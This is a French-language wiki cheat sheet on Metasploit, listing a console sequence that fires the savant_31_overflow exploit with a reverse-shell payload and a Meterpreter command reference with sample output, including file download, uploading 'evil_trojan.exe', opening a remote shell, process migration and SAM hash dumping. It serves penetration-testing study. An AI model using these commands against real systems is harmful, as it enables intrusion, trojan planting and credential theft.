Metasploit

De Linuxmemo.

Version du 29 août 2012 à 13:35 par Linuxmemo (discuter | contributions)

(diff) ← Version précédente | Voir la version courante (diff) | Version suivante → (diff)

shell

help, info, set, show et use.

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit

show options Affiche la liste des options et valeurs courantes (celles spécifiées avec la commande set)

show exploits Affiche la liste des exploits

show targets Affiche la liste des cibles

show payloads Affiche la liste des payloads disponibles

show advanced Affiche les options avancées

Arborescence des modules

Auxiliary La version 3.0 supporte le concept de modules auxiliaires qui peuvent être utilisés afin d'exécuter des actions arbitraires telles que le scan de ports, le déni de services entre autres.

Encoder

Exploit Les modules "Exploit" sont les modules principaux dans Metasploit.

Nop Les modules NOP sont utilisés pour les instructions de type "no-operation" pour exploiter les débordements de buffers.

Payload Les charges utilies (Payload en anglais) sont des portions de code (shellcode) exécutées lorsque l'exploit réussi. Les charges utiles permettent d'assurrer la communication entre Metasploit et la victime.

meterpreter

help

The 'help' command, as may be expected, displays the Meterpreter help menu.
meterpreter > help
Core Commands
=============

   Command       Description
   -------       -----------
   ?             Help menu
   background    Backgrounds the current session
   channel       Displays information about active channels
...snip...

background

The 'background' command will send the current Meterpreter session to the background and return you to the msf prompt. To get back to your Meterpreter session, just interact with it again.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

ps

The 'ps' command displays a list of running processes on the target.
meterpreter > ps
Process list
============

   PID   Name                  Path
   ---   ----                  ----
   132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
   152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
   288   snmp.exe              C:\WINDOWS\System32\snmp.exe
...snip...

migrate

Using the 'migrate' post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate 
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

ls

As in Linux, the 'ls' command will list the files in the current remote directory.
meterpreter > ls
Listing: C:\Documents and Settings\victim
=========================================
Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data
...snip...

download

The 'download' command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >

upload

As with the 'download' command, you need to use double-slashes with the 'upload' command.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >

ipconfig

The 'ipconfig' command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address  : 192.168.1.104
Netmask     : 255.255.0.0
meterpreter >

getuid

Running 'getuid' will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

execute

The 'execute' command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

shell

The 'shell' command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

idletime

Running 'idletime' will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

hashdump

The 'hashdump' post module will dump the contents of the SAM database.

Metasploit

De Linuxmemo.

shell

Arborescence des modules

meterpreter

Affichages

Outils personnels

Navigation

Rechercher

Boîte à outils